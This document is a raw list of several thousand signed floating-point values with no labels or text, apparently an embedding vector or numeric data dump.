0.025114985182881355, 0.006504194810986519, 0.009010433219373226, 0.005113928113132715, -0.0030773747712373734, -0.005914270877838135, -0.005151502788066864, 0.007601378485560417, 0.027354441583156586, -0.000983519945293665, 0.0059668757021427155, 0.01301590446382761, 0.007390959654003382, 0.022905588150024414, 0.013729825615882874, -0.0038082043174654245, -0.016322486102581024, -0.007710345555096865, 0.0015772015321999788, -0.017900627106428146, 0.024408578872680664, 0.017419669777154922, 0.0017481667455285788, 0.0007848432869650424, 0.016998831182718277, 0.0016035038279369473, -0.057925283908843994, -0.01977936550974846, 0.004140741191804409, 0.004381219856441021, 0.015781408175826073, -0.005256711971014738, -0.002992831403389573, 0.02449875883758068, 0.02018517255783081, -0.020891578868031502, -0.022003792226314545, -0.006342623382806778, 0.007248175796121359, -0.010723843239247799, 0.021207207813858986, -0.0008614019025117159, 0.00293271173723042, 0.03132233768701553, -0.009063037112355232, 0.01022785622626543, -0.015120092779397964, -0.02059098146855831, 0.007135451305657625, 0.022364510223269463, 0.02930833026766777, -0.014473806135356426, -0.00612468970939517, -0.014481320977210999, -0.017389608547091484, -0.004460126627236605, -0.01062614843249321, 0.0009215215686708689, -0.002943984232842922, 0.009040492586791515, 0.030991680920124054, -0.0014917189255356789, 0.020711220800876617, 0.012309499084949493, -0.01944870688021183, 0.010986866429448128, -0.0014240843011066318, -0.013504376634955406, 0.010979351587593555, -0.015450750477612019, -0.003522635903209448, 0.016683204099535942, 0.008567050099372864, -0.003054829780012369, 0.0031525243539363146, 0.010844082571566105, -0.02059098146855831, -0.017524879425764084, 0.04031022638082504, 0.00028368961648084223, 0.01717919111251831, 0.0023183641023933887, 0.020966729149222374, -0.017720267176628113, 0.021177146583795547, 0.04373704642057419, -0.0009482936002314091, 0.003964139614254236, 0.003462516237050295, 0.006958849728107452, -0.013459287583827972, 0.040189988911151886, 0.00046263952390290797, -0.0036409965250641108, -0.007965854369103909, -0.005670034792274237, 0.004865934140980244, 0.015781408175826073, -0.016097037121653557, -0.006410257890820503, 0.011790966615080833, -0.018501823768019676, -0.0016561085358262062, -0.0023503026459366083, -0.00020748325914610177, -0.0053018019534647465, 0.02960892952978611, 0.001518960576504469, 0.014631620608270168, -0.015180212445557117, -0.000374338764231652, -0.001848679268732667, -0.01149788312613964, 0.011948781087994576, 0.02248474955558777, 0.007413504645228386, -0.0092884860932827, 0.026152048259973526, -0.002742959186434746, 0.003537665819749236, 0.006075842306017876, -0.008800013922154903, -0.006876185070723295, -0.03682328760623932, 0.0019388587679713964, -0.02739953063428402, 0.003051072359085083, -0.007578833494335413, 0.001991463592275977, 0.011790966615080833, -0.003342276904731989, -0.0006664827233180404, 0.005177805200219154, -0.023116005584597588, 0.01573631912469864, 0.016457755118608475, -0.026617975905537605, -0.02736947126686573, 0.008867648430168629, 0.016833502799272537, 0.008484385907649994, -0.014391141943633556, -0.03297562897205353, 0.013339048251509666, 0.01435356680303812, -0.0029139243997633457, -0.0013198142405599356, -0.013654676266014576, -0.003364821895956993, 0.01650284416973591, -0.021312417462468147, -0.0016222912818193436, -0.0073421127162873745, 0.014233327470719814, -0.017119070515036583, -0.019238289445638657, 0.03856675699353218, 0.005260469391942024, -0.01385006494820118, 0.025355463847517967, 0.009671748615801334, 0.02406289055943489, -0.005294286645948887, 0.008116153068840504, 0.01690865308046341, 0.0019050415139645338, -0.010851597413420677, 0.01188114657998085, 0.0056061577051877975, 0.02245469018816948, -0.039949510246515274, -0.027279291301965714, -0.022469719871878624, 0.0199446938931942, 0.002568236319348216, -0.020064933225512505, 0.01594673842191696, 0.02215409092605114, -0.020290382206439972, 0.01761505752801895, 0.014060483314096928, -0.018622063100337982, -0.03297562897205353, 0.0021286115515977144, -0.008724864572286606, 0.007612650748342276, 0.01841164380311966, 0.003462516237050295, -0.007958338595926762, 0.01904289983212948, 0.02840653620660305, -0.010483364574611187, 0.014045453630387783, 0.018231283873319626, -0.012369618751108646, -0.01369976531714201, 0.02516007423400879, -0.003781901905313134, -0.025746241211891174, -0.006030752789229155, 0.009183276444673538, -0.020305411890149117, -0.011723332107067108, -0.006770975887775421, 0.006060812622308731, 0.011400189250707626, 0.02947365865111351, -0.00029613624792546034, -0.013977819122374058, -0.013782430440187454, -0.014165692962706089, -0.03339646756649017, -0.0021868522744625807, 0.014473806135356426, 0.023236244916915894, 0.021327447146177292, 0.017660148441791534, -0.020801398903131485, -0.01901284046471119, -0.022003792226314545, 0.004054319113492966, -0.011490368284285069, -0.007097876630723476, -0.020140083506703377, 0.015766378492116928, -0.023882532492280006, -0.012775425799190998, -0.01988457515835762, 0.0013930851127952337, -0.006752188317477703, 0.018486792221665382, -0.009228366427123547, 0.00850693043321371, 0.013910184614360332, 0.006861155387014151, 0.03171311691403389, 0.002566357608884573, -0.020846489816904068, 0.017720267176628113, 0.011708302423357964, -0.013414197601377964, 0.005880453623831272, -0.004542791284620762, -0.04755464568734169, -0.018096014857292175, 0.002806836273521185, 0.020530860871076584, -0.0019294650992378592, -0.014391141943633556, 0.01435356680303812, -0.0037537207826972008, -0.001642957329750061, 0.03339646756649017, -0.006838610395789146, -0.005159017629921436, 0.009318546392023563, 0.00644031772390008, -0.017765358090400696, 0.007943308912217617, 0.020996788516640663, -0.005583612713962793, -0.0004523064417298883, 0.019809424877166748, 0.006613161880522966, 0.016021886840462685, -0.010265430435538292, -0.03886735439300537, 0.02917306125164032, 0.004989931359887123, 0.017028892412781715, 0.00010579649824649096, 0.011603092774748802, 0.019433677196502686, 0.004347402136772871, -0.013045964762568474, -0.015495840460062027, 0.0006848004413768649, -0.011137165129184723, 0.02209397219121456, 0.01445126160979271, 0.00583912106230855, -0.023266306146979332, -0.027745218947529793, 0.011700787581503391, 0.005658762063831091, 0.015195242129266262, -0.02018517255783081, 0.008860133588314056, 0.024288339540362358, -0.021267326548695564, 0.05561067909002304, 0.007710345555096865, 0.023942651227116585, 0.009386180900037289, 0.019704215228557587, -0.002742959186434746, 0.017825476825237274, 0.022650079801678658, -0.007755435071885586, 0.0031055558938533068, -0.005376951303333044, -0.0043774619698524475, 0.007511198986321688, -0.003116828156635165, -0.017194220796227455, 0.005891725886613131, -0.0044563692063093185, -0.0018787391018122435, -0.01067875325679779, 0.0271740835160017, 0.016893621534109116, 0.002397271106019616, -0.0065567996352910995, 0.005019990727305412, 0.00752622913569212, 0.01633751578629017, 0.006026994902640581, -0.02119217813014984, 0.0038739601150155067, 0.017224280163645744, -0.019238289445638657, 0.004561578389257193, -0.008296512067317963, 0.012076535262167454, 0.008800013922154903, 0.012843060307204723, -0.005824091378599405, 0.006057054735720158, -0.031532756984233856, 0.01811104454100132, -0.0046555157750844955, 0.006049539893865585, -0.0004255344101693481, -0.003486939938738942, 0.0018881327705457807, -0.0023653325624763966, -0.018997810781002045, 0.012362103909254074, 0.013789945282042027, -0.01321880891919136, -0.0010896687163040042, -0.0032746423967182636, -0.0059518455527722836, 0.00595560297369957, 0.048606738448143005, 0.025505762547254562, 0.019373558461666107, -0.00007168563752202317, 0.014225812628865242, -0.00310367695055902, -0.0017904384294524789, -0.0020102509297430515, 0.01558601949363947, -0.003592149121686816, 0.008544505573809147, -0.012715306133031845, 0.030029766261577606, -0.0034380925353616476, -0.003349791979417205, -0.015315481461584568, -0.011122135445475578, 0.00022650549362879246, -0.02389756217598915, 0.036913465708494186, -0.0019970997236669064, -0.021462716162204742, -0.017584998160600662, 0.00430231261998415, -0.018922660499811172, 0.004584123380482197, 0.008747409097850323, 0.00595560297369957, 0.007717860396951437, -0.0022507295943796635, 0.00644031772390008, -0.020711220800876617, -0.008123667910695076, -0.016923682764172554, 0.013925214298069477, 0.00031374942045658827, 0.0065981317311525345, 0.0018073470564559102, -0.011527943424880505, 0.0009356120717711747, -0.006462862715125084, -0.001495476346462965, -0.014308476820588112, -0.037514664232730865, -0.026783304288983345, 0.014323507435619831, -0.009453815408051014, -0.008815043605864048, -0.026978693902492523, 0.00994228757917881, 0.00680855056270957, -0.008830074220895767, -0.005775243975222111, 0.0033216108568012714, -0.0099723469465971, 0.010167736560106277, -0.024814385920763016, -0.001846800558269024, -0.009190792217850685, 0.015277906320989132, -0.030119946226477623, -0.0015508991200476885, -0.0382361002266407, 0.012271923944354057, 0.015127607621252537, -0.01173084694892168, -0.026377497240900993, -0.019193198531866074, -0.00333288311958313, 0.007732890080660582, 0.014421201311051846, 0.0074022323824465275, 0.02452881820499897, -0.010453304275870323, -0.0006274988409131765, -0.004937326535582542, 0.008131182752549648, 0.01164818275719881, 0.01348183210939169, -0.007988398894667625, 0.005692579783499241, -0.010333064943552017, 0.021567925810813904, 0.007653983309864998, 0.003997956868261099, -0.000597439066041261, 0.0035076059866696596, -0.009318546392023563, 0.018501823768019676, 0.0013320260914042592, 0.0026734457351267338, 0.0005819394718855619, -0.0005138351698406041, 0.010400699451565742, -0.017299430444836617, 0.015856558457016945, -0.0017124706646427512, 0.0017444093246012926, -0.007199328392744064, -0.015135122463107109, 0.003881474956870079, 0.004850904457271099, 0.007785494904965162, -0.007094118744134903, 0.006410257890820503, 0.014413686469197273, 0.010242885909974575, -0.006635706406086683, -0.017284400761127472, -0.018261345103383064, 0.0012427859473973513, 0.005068838130682707, 0.010445789434015751, 0.005861666053533554, 0.0233564842492342, -0.005027506034821272, 0.0036316027399152517, -0.011693272739648819, 0.010550999082624912, -0.0006462862365879118, 0.016202246770262718, 0.036041732877492905, 0.014496351592242718, -0.018592001870274544, 0.0006918456638231874, 0.005143987946212292, -0.024513788521289825, 0.0013348441570997238, 0.003982927184551954, 0.02245469018816948, 0.0233564842492342, 0.01860703155398369, 0.007112906314432621, 0.003101798240095377, -0.022785348817706108, 0.011475338600575924, 0.0018731029704213142, 0.0032671273220330477, 0.004659273196011782, -0.00017225689953193069, 0.011685756966471672, 0.00632383581250906, -0.005538522731512785, 0.019163139164447784, -0.000007654393812117632, 0.00957405474036932, -0.005136472638696432, -0.0029045306146144867, -0.01007755659520626, 0.014766889624297619, 0.01723930984735489, 0.001635442371480167, 0.011031956411898136, 0.0017556817037984729, -0.0011281828628852963, 0.0025851449463516474, -0.016803443431854248, 0.0037274183705449104, 0.004967386368662119, -0.005136472638696432, 0.006049539893865585, -0.01964409649372101, -0.0012052111560478806, 0.008461841382086277, -0.005204107612371445, 0.004685575608164072, -0.002091036643832922, -0.0011450914898887277, 0.00828899722546339, -0.0028932583518326283, -0.0203505028039217, -0.0092884860932827, -0.023476723581552505, -0.02054589055478573, 0.024017801508307457, 0.017630087211728096, 0.012542461976408958, 0.013714795932173729, 0.011573033407330513, 0.00020008572028018534, 0.027549831196665764, -0.01293324027210474, 0.00027218234026804566, 0.014894643798470497, 0.0059518455527722836, -0.005891725886613131, 0.02830132655799389, 0.018637092784047127, 0.0028970157727599144, -0.0019614037591964006, -0.0018317706417292356, 0.010986866429448128, -0.019388588145375252, -0.011993871070444584, 0.01794571615755558, 0.0020008571445941925, 0.015495840460062027, 0.0004264737945050001, -0.0004090954316779971, 0.012737851589918137, 0.0044112796895205975, -0.008334087207913399, 0.006353895645588636, 0.014699255116283894, -0.004103166051208973, -0.003101798240095377, -0.017885597422719002, 0.006398985628038645, -0.00547088822349906, 0.016382604837417603, -0.0376950204372406, 0.007717860396951437, -0.0014137511607259512, 0.0007773283286951482, -0.008627169765532017, -0.0017566210590302944, -0.014654165133833885, -0.012707791291177273, 0.0028988944832235575, -0.02346169389784336, 0.01490215864032507, 0.030225155875086784, -0.004024259280413389, -0.0059518455527722836, -0.009010433219373226, 0.035109877586364746, -0.013489346951246262, 0.003718024818226695, -0.003780023194849491, -0.0031525243539363146, 0.0037743868306279182, -0.011753392405807972, -0.02242463082075119, 0.016953742131590843, 0.0012446646578609943, -0.017569968476891518, 0.024513788521289825, -0.0012183623621240258, -0.007191813550889492, 0.00512895779684186, -0.014624105766415596, 0.0015339904930442572, -0.024754267185926437, 0.009250911884009838, 0.0026471433229744434, 0.03225419297814369, -0.006631948985159397, 0.015616079792380333, 0.008491900749504566, -0.000031997275073081255, -0.01723930984735489, -0.0012596945744007826, -0.03270509093999863, 0.008311541751027107, 0.008875163272023201, 0.023446664214134216, -0.008446810767054558, -0.006259958725422621, 0.017765358090400696, -0.0000047959219955373555, -0.008792499080300331, -0.0042722527869045734, 0.01049087941646576, 0.001315117347985506, 0.028526775538921356, 0.005512220785021782, 0.007762949913740158, 0.015127607621252537, 0.009957317262887955, -0.008018458262085915, 0.011941266246140003, -0.004779512528330088, 0.004313584882766008, 0.004828359466046095, -0.010423244908452034, 0.0020722493063658476, 0.008424266241490841, -0.006545526906847954, 0.0006862094742245972, 0.03004479594528675, 0.024513788521289825, -0.016758352518081665, -0.015029912814497948, -0.021177146583795547, 0.002385998610407114, -0.005835363641381264, 0.02045571245253086, 0.015465780161321163, -0.007274477742612362, 0.0030961621087044477, -0.03471909835934639, 0.0188475102186203, 0.0003670586447697133, -0.0022883042693138123, 0.01590164750814438, 0.0063576530665159225, -0.014007879421114922, 0.014984823763370514, 0.0034813035745173693, 0.013000874780118465, 0.00846935622394085, 0.022139061242341995, -0.005594884976744652, 0.011663212440907955, -0.010130161419510841, 0.00527174212038517, 0.010986866429448128, -0.0006434681708924472, -0.011903691105544567, 0.010513423942029476, 0.014315992593765259, -0.006353895645588636, 0.011618122458457947, 0.00949139054864645, 0.0007143905386328697, -0.010483364574611187, 0.006026994902640581, -0.02007996290922165, 0.00040087595698423684, 0.015495840460062027, 0.0007909491541795433, -0.004245950374752283, 0.03835633769631386, 0.020110024139285088, 0.023146066814661026, -0.01159557793289423, -0.013188748620450497, -0.014128117822110653, -0.006831095553934574, 0.01977936550974846, 0.01641266420483589, -0.01261761225759983, -0.01701386086642742, 0.004490186460316181, 0.00010744039173005149, -0.0015330511378124356, -0.007650225888937712, 0.006947577465325594, 0.006774733308702707, -0.006601889152079821, 0.01279797125607729, 0.02048577181994915, -0.030029766261577606, 0.025641031563282013, -0.004738179966807365, -0.014158178120851517, -0.0074285343289375305, 0.01753990910947323, -0.01149788312613964, -0.0010351852979511023, 0.000032877935154829174, 0.0009313849150203168, -0.018396614119410515, 0.00023495980713050812, 0.015991827473044395, -0.0033009445760399103, 0.007304537575691938, 0.016217276453971863, 0.021913614124059677, 0.025550851598381996, -0.005715124309062958, 0.002224427182227373, -0.012234348803758621, 0.0031450092792510986, -0.013203778304159641, -0.003926564939320087, 0.010716328397393227, 0.003892747452482581, 0.023506784811615944, 0.005283014383167028, 0.014736829325556755, 0.010039981454610825, -0.016187217086553574, 0.009964832104742527, -0.004362432286143303, 0.03616197034716606, 0.016457755118608475, 0.019358528777956963, -0.001111274235881865, -0.005283014383167028, 0.04575105383992195, -0.024769296869635582, -0.009408725425601006, -0.01067875325679779, -0.017404640093445778, -0.012204289436340332, -0.005538522731512785, 0.01701386086642742, -0.0077479202300310135, 0.0020158870611339808, 0.0025250252801924944, -0.0002597356797195971, -0.01151291374117136, -0.017630087211728096, -0.006094629876315594, 0.006184809375554323, -0.010167736560106277, -0.02633240818977356, -0.009040492586791515, 0.00846935622394085, -0.004753210116177797, -0.02038056217133999, -0.0065380120649933815, 0.009032977744936943, 0.010791477747261524, -0.01854691281914711, 0.028211146593093872, -0.003411790356040001, 0.022514808923006058, -0.003892747452482581, 0.015540930442512035, 0.004974901210516691, -0.009453815408051014, 0.00600820779800415, 0.017600027844309807, 0.004978658631443977, -0.02589653991162777, -0.005921785719692707, 0.0133841373026371, 0.016728293150663376, 0.0035620892886072397, -0.012843060307204723, -0.006970121990889311, 0.004580365959554911, 0.02065110020339489, -0.004651757888495922, 0.001879678457044065, -0.00777798006311059, 0.016051946207880974, 0.040550705045461655, 0.0013902669306844473, -0.004689333029091358, -0.014361081644892693, -0.01219677459448576, 0.0043511600233614445, 0.009716838598251343, 0.004941083956509829, 0.002139883814379573, 0.023236244916915894, -0.002757989102974534, -0.010821537114679813, -0.001497355056926608, 0.007173025980591774, -0.008777469396591187, -0.008221362717449665, -0.022078942507505417, 0.013895154930651188, -0.0012183623621240258, 0.015826499089598656, -0.005027506034821272, -0.009416240267455578, 0.002682839520275593, -0.002756110392510891, -0.03492951765656471, -0.006143476814031601, 0.009175761602818966, -0.014932218939065933, -0.008935282938182354, -0.03571107238531113, 0.007785494904965162, 0.0004128529108129442, 0.0011253647971898317, 0.019839486107230186, 0.0016194730997085571, 0.0002653718984220177, -0.007905734702944756, 0.005782758817076683, -0.01854691281914711, -0.0006913759862072766, -0.0028932583518326283, -0.015292936936020851, 0.00800342857837677, 0.010513423942029476, 0.008935282938182354, -0.005170289892703295, -0.01173084694892168, -0.024513788521289825, 0.006256201304495335, 0.03444856032729149, 0.006263716146349907, 0.0031938564497977495, 0.0043173423036932945, -0.004354917444288731, -0.009934772737324238, -0.0016391999088227749, 0.006947577465325594, -0.01570625975728035, 0.02048577181994915, -0.014571500942111015, 0.016217276453971863, 0.019103018566966057, -0.008078577928245068, 0.005700094625353813, 0.028827372938394547, 0.0007538440986536443, -0.010971836745738983, 0.005703852046281099, -0.01781044714152813, -0.004080621525645256, 0.011370128951966763, 0.0036710563581436872, -0.03354676440358162, -0.0035696043632924557, -0.006910002324730158, 0.009581569582223892, -0.014804464764893055, -0.012452282942831516, 0.014143148437142372, 0.02392762154340744, 0.010693782940506935, -0.004099408630281687, 0.0285418052226305, 0.0045953961089253426, -0.00024024376762099564, -0.02038056217133999, -0.01375237014144659, -0.010611118748784065, -0.020936669781804085, 0.017720267176628113, -0.0011206679046154022, 0.0015471416991204023, -0.020260322839021683, 0.009190792217850685, -0.01209907978773117, -0.009664233773946762, -0.0031468879897147417, 0.011385159566998482, -0.019358528777956963, -0.012978330254554749, 0.016322486102581024, -0.026783304288983345, -0.01049087941646576, 0.009799503721296787, -0.011926235631108284, 0.016097037121653557, -0.013451771810650826, -0.0005546977045014501, -0.00023695596610195935, 0.025310372933745384, -0.026978693902492523, -0.017600027844309807, -0.0035433019511401653, -0.02747468091547489, -0.0018449218478053808, -0.0049222963862121105, 0.005500948056578636, 0.0008712652488611639, -0.0008665684144943953, 0.012955784797668457, 0.0039716544561088085, 0.0079207643866539, -0.0024386034347116947, 0.005174047779291868, 0.013091053813695908, 0.0018947083735838532, -0.014526410959661007, 0.0037311760243028402, 0.0007500866195186973, -0.013339048251509666, -0.014729314483702183, -0.007646468468010426, 0.0014362960355356336, -0.0057076094672083855, -0.015916677191853523, -0.002513753017410636, 0.003761235624551773, 0.012595066800713539, 0.011685756966471672, -0.003900262527167797, -0.009844592772424221, -0.0028030788525938988, 0.0000015117979046408436, 0.01955391652882099, 0.007710345555096865, 0.04166292026638985, -0.017434699460864067, -0.010881656780838966, -0.011332554742693901, 0.008830074220895767, 0.0007801464525982738, 0.0008637502905912697, -0.057865165174007416, 0.02780533954501152, -0.025009775534272194, 0.0037386908661574125, 0.0020365531090646982, -0.0021887309849262238, 0.010648692958056927, 0.014173207804560661, 0.0006195142050273716, 0.01059608906507492, -0.0031356154941022396, -0.00503877829760313, 0.017089011147618294, 0.0026170837227255106, -0.010731358081102371, 0.004095651209354401, 0.04106172174215317, -0.020966729149222374, 0.017058951780200005, 0.012557492591440678, 0.0058729383163154125, 0.0060532973147928715, 0.008454326540231705, -0.006748430896550417, 0.00045442002010531723, -0.003486939938738942, -0.01285057608038187, -0.015285421162843704, -0.0005922724958509207, -0.012843060307204723, -0.020290382206439972, 0.005328104365617037, 0.00883758906275034, -0.009048007428646088, 0.0022901829797774553, -0.01570625975728035, -0.010663723573088646, 0.012655186466872692, 0.024107979610562325, 0.03790543973445892, -0.010814022272825241, 0.01430096197873354, -0.003594028064981103, 0.0012596945744007826, 0.014308476820588112, 0.006816065404564142, 0.006184809375554323, -0.012151684612035751, -0.0031938564497977495, 0.006669524125754833, 0.009386180900037289, 0.004058076534420252, -0.0048020570538938046, -0.0016326243057847023, -0.014128117822110653, -0.0024968443904072046, 0.0301800649613142, 0.0036297240294516087, -0.01022785622626543, -0.0068573979660868645, -0.014774404466152191, -0.012955784797668457, 0.013511891476809978, -0.011452794075012207, 0.012069020420312881, -0.004084378946572542, 0.004764482378959656, 0.015067487955093384, 0.019268348813056946, -0.005072595551609993, -0.0005396677879616618, -0.012369618751108646, -0.017569968476891518, 0.025490732863545418, -0.02032044157385826, 0.007653983309864998, -0.0023672112729400396, -0.005196592304855585, 0.003524514613673091, -0.0169387124478817, 0.003718024818226695, -0.005151502788066864, 0.0055272504687309265, 0.013113599270582199, -0.008416751399636269, 0.008258936926722527, 0.0016608054284006357, -0.014000363647937775, 0.01851685345172882, -0.011152195744216442, -0.0017622573068365455, 0.007995913736522198, 0.009528964757919312, -0.004238435532897711, 0.0025250252801924944, 0.006271230988204479, 0.016082007437944412, -0.00407686410471797, -0.010130161419510841, -0.0158415287733078, 0.023131035268306732, -0.004140741191804409, -0.009348605759441853, -0.000010120239494426642, 0.011603092774748802, 0.0051815626211464405, -0.017855536192655563, 0.0251300148665905, -0.022109001874923706, 0.026783304288983345, 0.009589084424078465, -0.0005579855060204864, 0.0011901812395080924, -0.003349791979417205, 0.00855202041566372, 0.0037537207826972008, 0.004911024123430252, -0.031863417476415634, 0.0052228947170078754, -0.001910677645355463, 0.012369618751108646, 0.007853129878640175, -0.0035188784822821617, 0.0074623520486056805, 0.006462862715125084, 0.0039904420264065266, 0.00988968275487423, 0.013459287583827972, -0.0009074310073629022, -0.014594045467674732, -0.0016899259062483907, -0.0012578158639371395, 0.011422733776271343, -0.0004988052533008158, -0.005237924866378307, -0.0027936850674450397, 0.019674155861139297, 0.015450750477612019, -0.0046555157750844955, 0.003648511366918683, -0.004914781544357538, -0.006579344626516104, 0.01955391652882099, -0.022785348817706108, 0.003770629409700632, -0.009348605759441853, -0.0059931776486337185, 0.01791565679013729, -0.0048170872032642365, -0.01594673842191696, -0.0052416822873055935, 0.023972710594534874, 0.0009398392285220325, 0.004279767628759146, -0.001318874885328114, -0.017119070515036583, 0.020245293155312538, 0.0051214429549872875, -0.0007965854019857943, -0.0021793374326080084, -0.03405778482556343, 0.004610425792634487, -0.007173025980591774, 0.0124297384172678, -0.004764482378959656, 0.007477381732314825, -0.007469866890460253, -0.008349116891622543, 0.013714795932173729, -0.024709176272153854, 0.011580548249185085, -0.007935794070363045, 0.022785348817706108, 0.005095140542834997, 0.004700605291873217, -0.005542280618101358, 0.01717919111251831, 0.00823639240115881, 0.0027767764404416084, 0.026587916538119316, -0.030465634539723396, -0.018426673486828804, 0.005696337204426527, -0.01062614843249321, -0.002333394018933177, 0.010039981454610825, 0.0027166567742824554, -0.027219172567129135, 0.0007421019836328924, 0.025280313566327095, 0.012204289436340332, 0.012670217081904411, 0.023942651227116585, -0.012076535262167454, -0.010716328397393227, -0.006042025052011013, 0.01204647496342659, -0.021673135459423065, -0.018531883135437965, -0.0019858272280544043, 0.008101123385131359, -0.0003318322997074574, -0.00036517990520223975, -0.014090543612837791, 0.005583612713962793, -0.007135451305657625, -0.01627739518880844, 0.0009647325496189296, 0.022980736568570137, -0.0127002764493227, 0.011625637300312519, -0.0051815626211464405, 0.008612140081822872, 0.011903691105544567, -0.010520938783884048, 0.014278417453169823, 0.011069530621170998, 0.011407704092562199, 0.013789945282042027, -0.010039981454610825, 0.006259958725422621, -0.012069020420312881, -0.0037875380367040634, 0.008762439712882042, -0.0062975334003567696, 0.01316620409488678, 0.0029101669788360596, -0.008709834888577461, 0.010115131735801697, 0.006586859468370676, -0.02365708351135254, -0.01131000928580761, 0.010017436929047108, -0.0018721634987741709, 0.008634684607386589, -0.0021210964769124985, -0.016066977754235268, -0.007180540822446346, 0.015172697603702545, -0.008416751399636269, -0.0075675612315535545, 0.012820515781641006, 0.00453527644276619, 0.009326061233878136, -0.0025419341400265694, -0.0006514528067782521, 0.01261761225759983, -0.012181744910776615, 0.009183276444673538, -0.01154297310858965, 0.007623923476785421, 0.007672770414501429, 0.01617218554019928, -0.015691230073571205, 0.019238289445638657, -0.027354441583156586, 0.004625455942004919, 0.008191302418708801, 0.010122646577656269, -0.020936669781804085, 0.007511198986321688, -0.0016147763235494494, -0.015540930442512035, -0.009048007428646088, 0.023176126182079315, 0.00868728943169117, -0.0002606750640552491, -0.012226833961904049, -0.0005833485047332942, -0.014811979606747627, -0.0059931776486337185, 0.022905588150024414, 0.019208228215575218, 0.001774469157680869, 0.00873989425599575, 0.013045964762568474, -0.006541769485920668, -0.004366189707070589, -0.0030304063111543655, -0.01633751578629017, 0.012377133592963219, 0.023251274600625038, 0.008078577928245068, 0.0017904384294524789, -0.021101998165249825, -0.033907484263181686, -0.011933751404285431, -0.01603691652417183, -0.0021755800116807222, 0.00538822403177619, 0.016232306137681007, -0.02245469018816948, 0.026287317276000977, -0.003169432980939746, -0.011693272739648819, 0.024679116904735565, 0.013421712443232536, -0.01219677459448576, 0.005677549634128809, -0.020500801503658295, 0.003919049631804228, 0.0189827810972929, 0.005174047779291868, 0.02739953063428402, 0.0461718924343586, 0.004264737945050001, 0.011001896113157272, 0.0007219054969027638, 0.004208375699818134, 0.014759374782443047, -0.011565517634153366, -0.0016082007205113769, 0.012527432292699814, -0.010821537114679813, 0.02105690725147724, 0.012271923944354057, -0.002857562154531479, -0.0022056398447602987, -0.009776958264410496, -0.009611628949642181, 0.010693782940506935, 0.016066977754235268, -0.006669524125754833, -0.0010643057757988572, 0.009957317262887955, -0.04839631915092468, 0.015525899827480316, 0.011370128951966763, 0.006827338133007288, -0.006455347873270512, -0.016532903537154198, 0.015150152146816254, -0.009190792217850685, 0.026227198541164398, 0.017720267176628113, 0.01487209927290678, -0.0010586695279926062, 0.01191120594739914, -0.006019480060786009, -0.0015058093704283237, 0.006707098800688982, 0.01390266977250576, -0.0005420162342488766, 0.009378666058182716, 0.01914810948073864, 0.005850393790751696, -0.012174229137599468, -0.018937690183520317, -0.0004795481509063393, 0.012444768100976944, -0.034839339554309845, 0.00393407978117466, -0.03084138222038746, -0.006654493976384401, 0.010062526911497116, -0.013076024129986763, 0.004381219856441021, -0.013549466617405415, -0.010956807062029839, -0.02696366421878338, -0.007913249544799328, -0.004167043603956699, -0.003657905152067542, -0.013038449920713902, -0.0018026501638814807, 0.005448343697935343, 0.006868670228868723, -0.005861666053533554, -0.00800342857837677, 0.00868728943169117, -0.026648035272955894, 0.00988968275487423, -0.0020365531090646982, 0.0024630269035696983, -0.00704151438549161, 0.004065591376274824, -0.00795082375407219, 0.01104698609560728, -0.01805092580616474, -0.005959360394626856, 0.014827009290456772, 0.0013010269030928612, -0.003526393324136734, -0.015195242129266262, 0.011137165129184723, 0.021162116900086403, -0.01567619852721691, 0.0010333064710721374, -0.030435573309659958, -0.019929664209485054, -0.002200003480538726, 0.001586595200933516, -0.003994199447333813, 0.0008952192147262394, 0.018862541764974594, 0.02262001857161522, 0.007233145646750927, 0.010483364574611187, 0.004486429039388895, -0.014894643798470497, -0.005677549634128809, -0.002331515308469534, 0.009063037112355232, 0.0065380120649933815, -0.0016504722880199552, 0.024874506518244743, -0.002757989102974534, -0.0016194730997085571, 0.017855536192655563, -0.0053468914702534676, -0.0043774619698524475, -0.017359549179673195, 0.007439807057380676, -0.010363125242292881, 0.011137165129184723, -0.005057565867900848, -0.016397634521126747, -0.00015934056136757135, 0.0007439806940965354, 0.013023419305682182, -0.002881985856220126, 0.0026790820993483067, 0.03138246014714241, -0.007003939710557461, 0.00897285807877779, -0.003043557284399867, -0.011001896113157272, 0.02182343415915966, -0.016322486102581024, 0.000880658975802362, -0.003892747452482581, 0.004911024123430252, -0.001429720432497561, -0.00985962338745594, -0.020906608551740646, 0.008311541751027107, 0.012813000939786434, 0.019403617829084396, -0.021703194826841354, -0.00020771809795405716, -0.0352301150560379, 0.00492981169372797, 0.0018759210361167789, -0.0016965013928711414, -0.0011093954090029001, 0.0012249379651620984, -0.014842038974165916, -0.00907055288553238, 0.01641266420483589, 0.011715817265212536, -0.024273309856653214, -0.0007594802882522345, -0.003233310068026185, -0.0322241336107254, -0.020530860871076584, 0.023266306146979332, 0.009138187393546104, 0.017464758828282356, -0.007469866890460253, 0.014842038974165916, -0.022544870153069496, 0.010062526911497116, -0.009250911884009838, 0.01315117347985506, -0.009987377561628819, 0.005794031545519829, -0.0018017108086496592, 0.027384500950574875, 0.00800342857837677, 0.008416751399636269, -0.0022939404007047415, 0.007199328392744064, 0.005433313548564911, 0.0011507277376949787, -0.0006880881846882403, -0.0024611481931060553, -0.01811104454100132, 0.00669206865131855, -0.005455858539789915, -0.008897708728909492, 0.008935282938182354, 0.020094994455575943, -0.00023366817913483828, 0.002688475651666522, 0.011588063091039658, -0.0016307455953210592, 0.002096672775223851, -0.011302494443953037, 0.005275499541312456, -0.012286953628063202, -0.008033488877117634, 0.0014109330950304866, 0.010303005576133728, -0.007345870137214661, 0.005651247221976519, 0.002201882191002369, 0.010723843239247799, -0.03565095365047455, -0.0014889007434248924, 0.0346890389919281, 0.004388734698295593, -0.007229388225823641, -0.030360424891114235, 0.00907055288553238, 0.0009478238644078374, 0.00024259218480437994, 0.0013836913276463747, 0.025355463847517967, -0.00994228757917881, -0.02720414288341999, -0.011926235631108284, 0.013489346951246262, 0.011558002792298794, -0.006147234234958887, 0.014000363647937775, 0.01330147311091423, 0.005572340451180935, -0.006801035720854998, -0.025806359946727753, 0.014443746767938137, -0.019974755123257637, -0.006000692956149578, 0.0038965048734098673, -0.026452647522091866, -0.0011441521346569061, -0.024543847888708115, 0.006624434143304825, -0.0017716509755700827, -0.00020548708562273532, 0.002562600187957287, 0.0017932564951479435, -0.017855536192655563, -0.00199334230273962, 0.016187217086553574, 0.010986866429448128, -0.011084561236202717, 0.005974390543997288, 0.002455512061715126, -0.005019990727305412, -0.016818473115563393, -0.004306070040911436, 0.0042910403572022915, 0.008957828395068645, 0.013970304280519485, 0.028647014871239662, 